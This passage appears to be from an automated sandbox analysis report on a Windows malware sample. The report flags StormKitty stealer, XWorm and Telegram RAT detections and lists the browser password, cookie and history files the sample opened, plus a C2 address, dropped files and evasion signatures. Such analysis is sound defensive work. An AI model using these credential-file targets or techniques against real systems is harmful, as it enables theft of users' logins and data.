                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected BrowserPasswordDump
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Yara detected StormKitty Stealer
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
                        Yara detected XWorm
                        Source: Yara matchFile source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		1
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		2
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        Scheduled Task/Job                        		1
                        DLL Side-Loading                        		11
                        Deobfuscate/Decode Files or Information                        		1
                        Input Capture                        		23
                        System Information Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		1
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Command and Scripting Interpreter                        		1
                        Registry Run Keys / Startup Folder                        		1
                        Access Token Manipulation                        		1
                        Abuse Elevation Control Mechanism                        		Security Account Manager541
                        Security Software Discovery                        		SMB/Windows Admin Shares1
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job                        		Login Hook12
                        Process Injection                        		21
                        Obfuscated Files or Information                        		NTDS2
                        Process Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell                        		Network Logon Script1
                        Scheduled Task/Job                        		22
                        Software Packing                        		LSA Secrets151
                        Virtualization/Sandbox Evasion                        		SSHKeylogging2
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Masquerading                        		DCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Modify Registry                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Access Token Manipulation                        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                        Process Injection                        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1535423 Sample: b39wW3jYKO.exe Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 37 ip-api.com 2->37 51 Suricata IDS alerts for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 17 other signatures 2->57 8 b39wW3jYKO.exe 3 31 2->8         started        13 OneDrive.exe 3 2->13         started        15 OneDrive.exe 2->15         started        signatures3 process4 dnsIp5 39 104.219.239.11, 49809, 49841, 6969 DATAWAGONUS United States 8->39 29 C:\Users\user\Documents\OneDrive.exe, PE32+ 8->29 dropped 31 C:\Users\user\AppData\Local\Temp\arndry.exe, PE32 8->31 dropped 33 C:\Users\...\OneDrive.exe:Zone.Identifier, ASCII 8->33 dropped 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->59 61 Drops PE files to the document folder of the user 8->61 63 Encrypted powershell cmdline option found 8->63 69 3 other signatures 8->69 17 arndry.exe 14 2 8->17         started        21 powershell.exe 23 8->21         started        65 Multi AV Scanner detection for dropped file 13->65 67 Machine Learning detection for dropped file 13->67 file6 signatures7 process8 dnsIp9 35 ip-api.com 208.95.112.1, 49832, 80 TUT-ASUS United States 17->35 41 Antivirus detection for dropped file 17->41 43 Machine Learning detection for dropped file 17->43 45 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->45 47 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 17->47 23 WerFault.exe 22 16 17->23         started        49 Loading BitLocker PowerShell Module 21->49 25 WmiPrvSE.exe 21->25         started        27 conhost.exe 21->27         started        signatures10 process11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.